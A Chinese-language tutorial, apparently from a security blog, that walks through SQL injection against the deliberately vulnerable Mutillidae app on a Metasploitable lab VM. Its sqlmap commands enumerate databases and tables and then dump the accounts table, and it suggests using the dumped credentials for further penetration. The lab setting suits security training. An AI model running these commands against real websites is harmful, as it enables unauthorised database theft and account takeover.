sql注入攻击

网站最常见并且可利用的漏洞是注入漏洞,当网站没有过滤用户输入,允许攻击者与后台系统交互时,将发生注入攻击。攻击者可以通过精心设计的输入数据以修改或从数据库中窃取数据。将一个可执行软件放到服务器,从而发出指令给操作系统。

其中,评估SQL注入漏洞最有效的工具是sqlmap,它是一个Python工具,可以自动开启Firebird、MicrosoftSQL、Mysql、Oracle、PostgresSQL、Sybase、SAP MaxDB数据库的侦测和利用。

        启动Metasploitable虚拟机,并访问Mutillidae网站。完成后,我们打开sql注入第一个页面,这个页面接受用户输入,包括用户名和密码。

所以这个页面可能受到SQL注入攻击。

        接下来打开Kali,并在命令提示符下输入以下内容:

[email protected]:~# sqlmap -u “http://172.16.6.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details” –dbs

sqlmap返回的数据如下图:

         最有可能存储web应用数据的数据库应该是nowasp数据库,因此,我们将使用以下命令检查数据库的所有表:

[email protected]:~# sqlmap -u “http://172.16.6.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details” -D nowasp –tables

执行上述命令后返回的数据如下:

         所有表都被列举,其中一个表的名称叫accounts ,我们将尝试从这个表读取用户数据并下载到本地(称为脱库):

[email protected]:~# sqlmap -u “http://172.16.6.133/mutillidae/index.php?page=user-info.php&username=admin&password=admin&user-info-php-submit-button=View+Account+Details” -D nowasp -T accounts –dump

接下来我们可以使用这些账号登录系统,或进行下一步渗透。

You may also like...